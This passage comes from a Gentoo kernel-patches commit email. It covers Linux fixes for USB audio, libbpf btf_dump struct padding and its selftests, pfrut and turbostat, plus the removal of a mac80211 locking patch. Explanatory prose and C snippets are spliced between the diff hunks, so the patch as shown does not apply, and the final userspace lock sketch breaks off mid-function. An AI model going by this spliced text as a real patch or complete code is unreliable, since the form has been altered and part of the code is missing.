+@@ -495,11 +495,14 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			break;
+ 		if (err < 0) {
+ 			/* push back to ready list again for -EAGAIN */
+-			if (err == -EAGAIN)
++			if (err == -EAGAIN) {
+ 				push_back_to_ready_list(ep, ctx);
+-			else
++				break;
++			}
++
++			if (!in_stream_lock)
+ 				notify_xrun(ep);
+-			return;
++			return -EPIPE;
+ 		}
+ 
+ 		err = usb_submit_urb(ctx->urb, GFP_ATOMIC);
+@@ -507,13 +510,16 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			usb_audio_err(ep->chip,
+ 				      "Unable to submit urb #%d: %d at %s\n",
+ 				      ctx->index, err, __func__);
+-			notify_xrun(ep);
+-			return;
++			if (!in_stream_lock)
++				notify_xrun(ep);
++			return -EPIPE;
+ 		}
+ 
+ 		set_bit(ctx->index, &ep->active_mask);
+ 		atomic_inc(&ep->submitted_urbs);
+ 	}
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index 924f4351588ce..c09f68ce08b18 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -52,7 +52,7 @@ int snd_usb_endpoint_implicit_feedback_sink(struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_next_packet_size(struct snd_usb_endpoint *ep,
+ 				      struct snd_urb_ctx *ctx, int idx,
+ 				      unsigned int avail);
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock);
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock);
+ 
+ #endif /* __USBAUDIO_ENDPOINT_H */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 405dc0bf6678c..4b1c5ba121f39 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -39,8 +39,12 @@ static u64 parse_audio_format_i_type(struct snd_usb_audio *chip,
+ 	case UAC_VERSION_1:
+ 	default: {
+ 		struct uac_format_type_i_discrete_descriptor *fmt = _fmt;
+-		if (format >= 64)
+-			return 0; /* invalid format */
++		if (format >= 64) {
++			usb_audio_info(chip,
++				       "%u:%d: invalid format type 0x%llx is detected, processed as PCM\n",
++				       fp->iface, fp->altsetting, format);
++			format = UAC_FORMAT_TYPE_I_PCM;
++		}
+ 		sample_width = fmt->bBitResolution;
+ 		sample_bytes = fmt->bSubframeSize;
+ 		format = 1ULL << format;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index d959da7a1afba..eec5232f9fb29 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -1639,7 +1639,7 @@ static int snd_usb_pcm_playback_ack(struct snd_pcm_substream *substream)
+ 	 * outputs here
+ 	 */
+ 	if (!ep->active_mask)
+-		snd_usb_queue_pending_output_urbs(ep, true);
++		return snd_usb_queue_pending_output_urbs(ep, true);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 69e80ee5f70e2..cfbec31e115cc 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -833,14 +833,9 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 				 const struct btf_type *t)
+ {
+ 	const struct btf_member *m;
+-	int align, i, bit_sz;
++	int max_align = 1, align, i, bit_sz;
+ 	__u16 vlen;
+ 
+-	align = btf__align_of(btf, id);
+-	/* size of a non-packed struct has to be a multiple of its alignment*/
+-	if (align && t->size % align)
+-		return true;
+-
+ 	m = btf_members(t);
+ 	vlen = btf_vlen(t);
+ 	/* all non-bitfield fields have to be naturally aligned */
+@@ -849,8 +844,11 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 		bit_sz = btf_member_bitfield_size(t, i);
+ 		if (align && bit_sz == 0 && m->offset % (8 * align) != 0)
+ 			return true;
++		max_align = max(align, max_align);
+ 	}
+-
++	/* size of a non-packed struct has to be a multiple of its alignment */
++	if (t->size % max_align != 0)
++		return true;
+ 	/*
+ 	 * if original struct was marked as packed, but its layout is
+ 	 * naturally aligned, we'll detect that it's not packed
+@@ -858,44 +856,97 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 	return false;
+ }
+ 
+-static int chip_away_bits(int total, int at_most)
+-{
+-	return total % at_most ? : at_most;
+-}
+-
+ static void btf_dump_emit_bit_padding(const struct btf_dump *d,
+-				      int cur_off, int m_off, int m_bit_sz,
+-				      int align, int lvl)
++				      int cur_off, int next_off, int next_align,
++				      bool in_bitfield, int lvl)
+ {
+-	int off_diff = m_off - cur_off;
+-	int ptr_bits = d->ptr_sz * 8;
++	const struct {
++		const char *name;
++		int bits;
++	} pads[] = {
++		{"long", d->ptr_sz * 8}, {"int", 32}, {"short", 16}, {"char", 8}
++	};
++	int new_off, pad_bits, bits, i;
++	const char *pad_type;
++
++	if (cur_off >= next_off)
++		return; /* no gap */
++
++	/* For filling out padding we want to take advantage of
++	 * natural alignment rules to minimize unnecessary explicit
++	 * padding. First, we find the largest type (among long, int,
++	 * short, or char) that can be used to force naturally aligned
++	 * boundary. Once determined, we'll use such type to fill in
++	 * the remaining padding gap. In some cases we can rely on
++	 * compiler filling some gaps, but sometimes we need to force
++	 * alignment to close natural alignment with markers like
++	 * `long: 0` (this is always the case for bitfields).  Note
++	 * that even if struct itself has, let's say 4-byte alignment
++	 * (i.e., it only uses up to int-aligned types), using `long:
++	 * X;` explicit padding doesn't actually change struct's
++	 * overall alignment requirements, but compiler does take into
++	 * account that type's (long, in this example) natural
++	 * alignment requirements when adding implicit padding. We use
++	 * this fact heavily and don't worry about ruining correct
++	 * struct alignment requirement.
++	 */
++	for (i = 0; i < ARRAY_SIZE(pads); i++) {
++		pad_bits = pads[i].bits;
++		pad_type = pads[i].name;
+ 
+-	if (off_diff <= 0)
+-		/* no gap */
+-		return;
+-	if (m_bit_sz == 0 && off_diff < align * 8)
+-		/* natural padding will take care of a gap */
+-		return;
++		new_off = roundup(cur_off, pad_bits);
++		if (new_off <= next_off)
++			break;
++	}
+ 
+-	while (off_diff > 0) {
+-		const char *pad_type;
+-		int pad_bits;
+-
+-		if (ptr_bits > 32 && off_diff > 32) {
+-			pad_type = "long";
+-			pad_bits = chip_away_bits(off_diff, ptr_bits);
+-		} else if (off_diff > 16) {
+-			pad_type = "int";
+-			pad_bits = chip_away_bits(off_diff, 32);
+-		} else if (off_diff > 8) {
+-			pad_type = "short";
+-			pad_bits = chip_away_bits(off_diff, 16);
+-		} else {
+-			pad_type = "char";
+-			pad_bits = chip_away_bits(off_diff, 8);
++	if (new_off > cur_off && new_off <= next_off) {
++		/* We need explicit `<type>: 0` aligning mark if next
++		 * field is right on alignment offset and its
++		 * alignment requirement is less strict than <type>'s
++		 * alignment (so compiler won't naturally align to the
++		 * offset we expect), or if subsequent `<type>: X`,
++		 * will actually completely fit in the remaining hole,
++		 * making compiler basically ignore `<type>: X`
++		 * completely.
++		 */
++		if (in_bitfield ||
++		    (new_off == next_off && roundup(cur_off, next_align * 8) != new_off) ||
++		    (new_off != next_off && next_off - new_off <= new_off - cur_off))
++			/* but for bitfields we'll emit explicit bit count */
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type,
++					in_bitfield ? new_off - cur_off : 0);
++		cur_off = new_off;
++	}
++
++	/* Now we know we start at naturally aligned offset for a chosen
++	 * padding type (long, int, short, or char), and so the rest is just
++	 * a straightforward filling of remaining padding gap with full
++	 * `<type>: sizeof(<type>);` markers, except for the last one, which
++	 * might need smaller than sizeof(<type>) padding.
++	 */
++	while (cur_off != next_off) {
++		bits = min(next_off - cur_off, pad_bits);
++		if (bits == pad_bits) {
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
++			cur_off += bits;
++			continue;
++		}
++		/* For the remainder padding that doesn't cover entire
++		 * pad_type bit length, we pick the smallest necessary type.
++		 * This is pure aesthetics, we could have just used `long`,
++		 * but having smallest necessary one communicates better the
++		 * scale of the padding gap.
++		 */
++		for (i = ARRAY_SIZE(pads) - 1; i >= 0; i--) {
++			pad_type = pads[i].name;
++			pad_bits = pads[i].bits;
++			if (pad_bits < bits)
++				continue;
++
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, bits);
++			cur_off += bits;
++			break;
+ 		}
+-		btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
+-		off_diff -= pad_bits;
+ 	}
+ }
+ 
+@@ -915,9 +966,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	bool is_struct = btf_is_struct(t);
+-	int align, i, packed, off = 0;
++	bool packed, prev_bitfield = false;
++	int align, i, off = 0;
+ 	__u16 vlen = btf_vlen(t);
+ 
++	align = btf__align_of(d->btf, id);
+ 	packed = is_struct ? btf_is_struct_packed(d->btf, id, t) : 0;
+ 
+ 	btf_dump_printf(d, "%s%s%s {",
+@@ -927,33 +980,36 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 
+ 	for (i = 0; i < vlen; i++, m++) {
+ 		const char *fname;
+-		int m_off, m_sz;
++		int m_off, m_sz, m_align;
++		bool in_bitfield;
+ 
+ 		fname = btf_name_of(d, m->name_off);
+ 		m_sz = btf_member_bitfield_size(t, i);
+ 		m_off = btf_member_bit_offset(t, i);
+-		align = packed ? 1 : btf__align_of(d->btf, m->type);
++		m_align = packed ? 1 : btf__align_of(d->btf, m->type);
+ 
+-		btf_dump_emit_bit_padding(d, off, m_off, m_sz, align, lvl + 1);
++		in_bitfield = prev_bitfield && m_sz != 0;
++
++		btf_dump_emit_bit_padding(d, off, m_off, m_align, in_bitfield, lvl + 1);
+ 		btf_dump_printf(d, "\n%s", pfx(lvl + 1));
+ 		btf_dump_emit_type_decl(d, m->type, fname, lvl + 1);
+ 
+ 		if (m_sz) {
+ 			btf_dump_printf(d, ": %d", m_sz);
+ 			off = m_off + m_sz;
++			prev_bitfield = true;
+ 		} else {
+ 			m_sz = max((__s64)0, btf__resolve_size(d->btf, m->type));
+ 			off = m_off + m_sz * 8;
++			prev_bitfield = false;
+ 		}
++
+ 		btf_dump_printf(d, ";");
+ 	}
+ 
+ 	/* pad at the end, if necessary */
+-	if (is_struct) {
+-		align = packed ? 1 : btf__align_of(d->btf, id);
+-		btf_dump_emit_bit_padding(d, off, t->size * 8, 0, align,
+-					  lvl + 1);
+-	}
++	if (is_struct)
++		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+ 	/*
+ 	 * Keep `struct empty {}` on a single line,
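
A hand-worked trace of the new padding algorithm on the simplest interesting case (derived from the code above, so treat it as illustrative rather than authoritative): two ints separated by a 32-bit hole.

struct padded_demo {
	int a;		/* bits 0..31; cur_off becomes 32 */
	long: 0;	/* gap to next_off = 64: roundup(32, 64) = 64 fits, and
			 * since 'int b' alone would align only to 32 bits, the
			 * emitter must force the 64-bit boundary explicitly */
	int b;		/* bits 64..95 */
};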
+diff --git a/tools/power/acpi/tools/pfrut/pfrut.c b/tools/power/acpi/tools/pfrut/pfrut.c
+index 52aa0351533c3..388c9e3ad0407 100644
+--- a/tools/power/acpi/tools/pfrut/pfrut.c
++++ b/tools/power/acpi/tools/pfrut/pfrut.c
+@@ -97,7 +97,7 @@ static struct option long_options[] = {
+ static void parse_options(int argc, char **argv)
+ {
+ 	int option_index = 0;
+-	char *pathname;
++	char *pathname, *endptr;
+ 	int opt;
+ 
+ 	pathname = strdup(argv[0]);
+@@ -125,11 +125,23 @@ static void parse_options(int argc, char **argv)
+ 			log_getinfo = 1;
+ 			break;
+ 		case 'T':
+-			log_type = atoi(optarg);
++			log_type = strtol(optarg, &endptr, 0);
++			if (*endptr || (log_type != 0 && log_type != 1)) {
++				printf("Number expected: type(0:execution, 1:history) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_type = 1;
+ 			break;
+ 		case 'L':
+-			log_level = atoi(optarg);
++			log_level = strtol(optarg, &endptr, 0);
++			if (*endptr ||
++			    (log_level != 0 && log_level != 1 &&
++			     log_level != 2 && log_level != 4)) {
++				printf("Number expected: level(0, 1, 2, 4) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_level = 1;
+ 			break;
+ 		case 'R':
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index c7b26a3603afe..3e1a4c4be001a 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -344,6 +344,8 @@ Alternatively, non-root users can be enabled to run turbostat this way:
+ 
+ # chmod +r /dev/cpu/*/msr
+ 
++# chmod +r /dev/cpu_dma_latency
++
+ .B "turbostat "
+ reads hardware counters, but doesn't write them.
+ So it will not interfere with the OS or other programs, including
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index aba460410dbd1..c61c6c704fbe6 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -4426,7 +4426,7 @@ int print_hwp(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 
+ 	fprintf(outf, "cpu%d: MSR_HWP_STATUS: 0x%08llx "
+ 		"(%sGuaranteed_Perf_Change, %sExcursion_Min)\n",
+-		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x2) ? "" : "No-");
++		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x4) ? "" : "No-");
+ 
+ 	return 0;
+ }
+@@ -5482,7 +5482,7 @@ void print_dev_latency(void)
+ 
+ 	retval = read(fd, (void *)&value, sizeof(int));
+ 	if (retval != sizeof(int)) {
+-		warn("read %s\n", path);
++		warn("read failed %s\n", path);
+ 		close(fd);
+ 		return;
+ 	}
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+index e5560a6560309..e01690618e1ee 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+@@ -53,7 +53,7 @@ struct bitfields_only_mixed_types {
+  */
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ struct bitfield_mixed_with_others {
+-	long: 4; /* char is enough as a backing field */
++	char: 4; /* char is enough as a backing field */
+ 	int a: 4;
+ 	/* 8-bit implicit padding */
+ 	short b; /* combined with previous bitfield */
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+index e304b6204bd9d..7998f27df7ddd 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+@@ -58,7 +58,81 @@ union jump_code_union {
+ 	} __attribute__((packed));
+ };
+ 
+-/*------ END-EXPECTED-OUTPUT ------ */
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct nested_packed_but_aligned_struct {
++ *	int x1;
++ *	int x2;
++ *};
++ *
++ *struct outer_implicitly_packed_struct {
++ *	char y1;
++ *	struct nested_packed_but_aligned_struct y2;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct nested_packed_but_aligned_struct {
++	int x1;
++	int x2;
++} __attribute__((packed));
++
++struct outer_implicitly_packed_struct {
++	char y1;
++	struct nested_packed_but_aligned_struct y2;
++};
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct usb_ss_ep_comp_descriptor {
++ *	char: 8;
++ *	char bDescriptorType;
++ *	char bMaxBurst;
++ *	short wBytesPerInterval;
++ *};
++ *
++ *struct usb_host_endpoint {
++ *	long: 64;
++ *	char: 8;
++ *	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++ *	long: 0;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct usb_ss_ep_comp_descriptor {
++	char: 8;
++	char bDescriptorType;
++	char bMaxBurst;
++	int: 0;
++	short wBytesPerInterval;
++} __attribute__((packed));
++
++struct usb_host_endpoint {
++	long: 64;
++	char: 8;
++	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++	long: 0;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct nested_packed_struct {
++	int a;
++	char b;
++} __attribute__((packed));
++
++struct outer_nonpacked_struct {
++	short a;
++	struct nested_packed_struct b;
++};
++
++struct outer_packed_struct {
++	short a;
++	struct nested_packed_struct b;
++} __attribute__((packed));
++
++/* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+ 	struct packed_trailing_space _1;
+@@ -69,6 +143,10 @@ int f(struct {
+ 	union union_is_never_packed _6;
+ 	union union_does_not_need_packing _7;
+ 	union jump_code_union _8;
++	struct outer_implicitly_packed_struct _9;
++	struct usb_host_endpoint _10;
++	struct outer_nonpacked_struct _11;
++	struct outer_packed_struct _12;
+ } *_)
+ {
+ 	return 0;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+index 7cb522d22a664..79276fbe454a8 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+@@ -19,7 +19,7 @@ struct padded_implicitly {
+ /*
+  *struct padded_explicitly {
+  *	int a;
+- *	int: 32;
++ *	long: 0;
+  *	int b;
+  *};
+  *
+@@ -28,41 +28,28 @@ struct padded_implicitly {
+ 
+ struct padded_explicitly {
+ 	int a;
+-	int: 1; /* algo will explicitly pad with full 32 bits here */
++	int: 1; /* algo will emit aligning `long: 0;` here */
+ 	int b;
+ };
+ 
+ /* ----- START-EXPECTED-OUTPUT ----- */
+-/*
+- *struct padded_a_lot {
+- *	int a;
+- *	long: 32;
+- *	long: 64;
+- *	long: 64;
+- *	int b;
+- *};
+- *
+- */
+-/* ------ END-EXPECTED-OUTPUT ------ */
+-
+ struct padded_a_lot {
+ 	int a;
+-	/* 32 bit of implicit padding here, which algo will make explicit */
+ 	long: 64;
+ 	long: 64;
+ 	int b;
+ };
+ 
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ /* ----- START-EXPECTED-OUTPUT ----- */
+ /*
+  *struct padded_cache_line {
+  *	int a;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+  *	int b;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+@@ -85,7 +72,7 @@ struct padded_cache_line {
+  *struct zone {
+  *	int a;
+  *	short b;
+- *	short: 16;
++ *	long: 0;
+  *	struct zone_padding __pad__;
+  *};
+  *
+@@ -108,6 +95,131 @@ struct padding_wo_named_members {
+ 	long: 64;
+ };
+ 
++struct padding_weird_1 {
++	int a;
++	long: 64;
++	short: 16;
++	short b;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct padding_weird_2 {
++ *	long: 56;
++ *	char a;
++ *	long: 56;
++ *	char b;
++ *	char: 8;
++ *};
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++struct padding_weird_2 {
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char a;
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char b;
++	char: 8;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct exact_1byte {
++	char x;
++};
++
++struct padded_1byte {
++	char: 8;
++};
++
++struct exact_2bytes {
++	short x;
++};
++
++struct padded_2bytes {
++	short: 16;
++};
++
++struct exact_4bytes {
++	int x;
++};
++
++struct padded_4bytes {
++	int: 32;
++};
++
++struct exact_8bytes {
++	long x;
++};
++
++struct padded_8bytes {
++	long: 64;
++};
++
++struct ff_periodic_effect {
++	int: 32;
++	short magnitude;
++	long: 0;
++	short phase;
++	long: 0;
++	int: 32;
++	int custom_len;
++	short *custom_data;
++};
++
++struct ib_wc {
++	long: 64;
++	long: 64;
++	int: 32;
++	int byte_len;
++	void *qp;
++	union {} ex;
++	long: 64;
++	int slid;
++	int wc_flags;
++	long: 64;
++	char smac[6];
++	long: 0;
++	char network_hdr_type;
++};
++
++struct acpi_object_method {
++	long: 64;
++	char: 8;
++	char type;
++	short reference_count;
++	char flags;
++	short: 0;
++	char: 8;
++	char sync_level;
++	long: 64;
++	void *node;
++	void *aml_start;
++	union {} dispatch;
++	long: 64;
++	int aml_length;
++};
++
++struct nested_unpacked {
++	int x;
++};
++
++struct nested_packed {
++	struct nested_unpacked a;
++	char c;
++} __attribute__((packed));
++
++struct outer_mixed_but_unpacked {
++	struct nested_packed b1;
++	short a1;
++	struct nested_packed b2;
++};
++
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+@@ -117,6 +229,20 @@ int f(struct {
+ 	struct padded_cache_line _4;
+ 	struct zone _5;
+ 	struct padding_wo_named_members _6;
++	struct padding_weird_1 _7;
++	struct padding_weird_2 _8;
++	struct exact_1byte _100;
++	struct padded_1byte _101;
++	struct exact_2bytes _102;
++	struct padded_2bytes _103;
++	struct exact_4bytes _104;
++	struct padded_4bytes _105;
++	struct exact_8bytes _106;
++	struct padded_8bytes _107;
++	struct ff_periodic_effect _200;
++	struct ib_wc _201;
++	struct acpi_object_method _202;
++	struct outer_mixed_but_unpacked _203;
+ } *_)
+ {
+ 	return 0;
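
The expected-output comments in the hunk above encode how the BTF dumper prints packed layouts: a struct whose packed member already forces 1-byte alignment gets re-emitted with an explicit __attribute__((packed)), even when the source declared none. The same layout facts can be checked from plain C; this sketch is not part of the patch — the struct names mirror the test, and the printed values are what GCC and Clang produce on common targets:

#include <stdio.h>
#include <stddef.h>

struct nested_packed_but_aligned_struct {
	int x1;
	int x2;
} __attribute__((packed));

/* No explicit attribute here: the packed member already gives the
 * struct 1-byte alignment, which is what the dumper's
 * __attribute__((packed)) annotation in the expected output records. */
struct outer_implicitly_packed_struct {
	char y1;
	struct nested_packed_but_aligned_struct y2;
};

int main(void)
{
	/* 9 on typical ABIs: char + 8-byte packed struct, no padding */
	printf("sizeof(outer) = %zu\n",
	       sizeof(struct outer_implicitly_packed_struct));
	/* 1: y2 starts right after y1 */
	printf("offsetof(y2)  = %zu\n",
	       offsetof(struct outer_implicitly_packed_struct, y2));
	return 0;
}

Compiled with `cc -Wall`, it prints 9 and 1: the packed member removes the padding that would otherwise follow y1, matching the expected output above.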


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-30 21:52 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-30 21:52 UTC (permalink / raw
  To: gentoo-commits

commit:     8bc34b9a0a752753031d74810d9bd32afee5a827
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 21:52:01 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 21:52:01 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8bc34b9a

Remove redundant patch

Removed:
2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...-serialize-ieee80211-handle-wake-tx-queue.patch | 84 ----------------------
 2 files changed, 88 deletions(-)

diff --git a/0000_README b/0000_README
index 737b0e84..47edd2da 100644
--- a/0000_README
+++ b/0000_README
@@ -95,10 +95,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:   wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
deleted file mode 100644
index ed730a0a..00000000
--- a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 007ae9b268ba7553e479608cf9735d3c4672a2ab Mon Sep 17 00:00:00 2001
-From: Alexander Wetzel <alexander@wetzel-home.de>
-Date: Tue, 14 Mar 2023 22:11:22 +0100
-Subject: wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
-
-ieee80211_handle_wake_tx_queue must not run concurrent multiple times.
-It calls ieee80211_txq_schedule_start() and the drivers migrated to iTXQ
-do not expect overlapping drv_tx() calls.
-
-This fixes 'c850e31f79f0 ("wifi: mac80211: add internal handler for
-wake_tx_queue")', which introduced ieee80211_handle_wake_tx_queue.
-Drivers started to use it with 'a790cc3a4fad ("wifi: mac80211: add
-wake_tx_queue callback to drivers")'.
-But only after fixing an independent bug with
-'4444bc2116ae ("wifi: mac80211: Proper mark iTXQs for resumption")'
-problematic concurrent calls really happened and exposed the initial
-issue.
-
-Fixes: c850e31f79f0 ("wifi: mac80211: add internal handler for wake_tx_queue")
-Reported-by: Thomas Mann <rauchwolke@gmx.net>
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=217119
-Link: https://lore.kernel.org/r/b8efebc6-4399-d0b8-b2a0-66843314616b@leemhuis.info/
-Link: https://lore.kernel.org/r/b7445607128a6b9ed7c17fcdcf3679bfaf4aaea.camel@sipsolutions.net>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Alexander Wetzel <alexander@wetzel-home.de>
-Link: https://lore.kernel.org/r/20230314211122.111688-1-alexander@wetzel-home.de
-[add missing spin_lock_init() noticed by Felix]
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/ieee80211_i.h | 3 +++
- net/mac80211/main.c        | 2 ++
- net/mac80211/util.c        | 3 +++
- 3 files changed, 8 insertions(+)
-
-diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
-index ecc232eb1ee82..e082582e0aa28 100644
---- a/net/mac80211/ieee80211_i.h
-+++ b/net/mac80211/ieee80211_i.h
-@@ -1284,6 +1284,9 @@ struct ieee80211_local {
- 	struct list_head active_txqs[IEEE80211_NUM_ACS];
- 	u16 schedule_round[IEEE80211_NUM_ACS];
- 
-+	/* serializes ieee80211_handle_wake_tx_queue */
-+	spinlock_t handle_wake_tx_queue_lock;
-+
- 	u16 airtime_flags;
- 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
- 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
-diff --git a/net/mac80211/main.c b/net/mac80211/main.c
-index 846528850612a..ddf2b7811c557 100644
---- a/net/mac80211/main.c
-+++ b/net/mac80211/main.c
-@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
- 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
- 	atomic_set(&local->aql_total_pending_airtime, 0);
- 
-+	spin_lock_init(&local->handle_wake_tx_queue_lock);
-+
- 	INIT_LIST_HEAD(&local->chanctx_list);
- 	mutex_init(&local->chanctx_mtx);
- 
-diff --git a/net/mac80211/util.c b/net/mac80211/util.c
-index 1a28fe5cb614f..3aceb3b731bf4 100644
---- a/net/mac80211/util.c
-+++ b/net/mac80211/util.c
-@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
- 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
- 	struct ieee80211_txq *queue;
- 
-+	spin_lock(&local->handle_wake_tx_queue_lock);
-+
- 	/* Use ieee80211_next_txq() for airtime fairness accounting */
- 	ieee80211_txq_schedule_start(hw, txq->ac);
- 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
-@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
- 		ieee80211_return_txq(hw, queue, false);
- 	}
- 	ieee80211_txq_schedule_end(hw, txq->ac);
-+	spin_unlock(&local->handle_wake_tx_queue_lock);
- }
- EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
- 
--- 
-cgit 
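
The removed patch's commit message explains the bug it fixed: ieee80211_handle_wake_tx_queue() calls ieee80211_txq_schedule_start(), and iTXQ drivers do not expect overlapping drv_tx() calls, so the fix takes a spinlock around the whole scheduling loop (the patch is dropped here as redundant once the fix reached the stable tree). The shape of that fix is easy to model in userspace; the following is a sketch only — a pthread mutex standing in for the kernel spinlock, with illustrative names rather than the real mac80211 symbols:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t handle_wake_tx_queue_lock = PTHREAD_MUTEX_INITIALIZER;
static long schedule_rounds;	/* stands in for the per-AC scheduling state */

/* Must never run concurrently with itself: the scheduling loop hands
 * frames to the driver, and drivers assume those calls are serialized. */
static void handle_wake_tx_queue(void)
{
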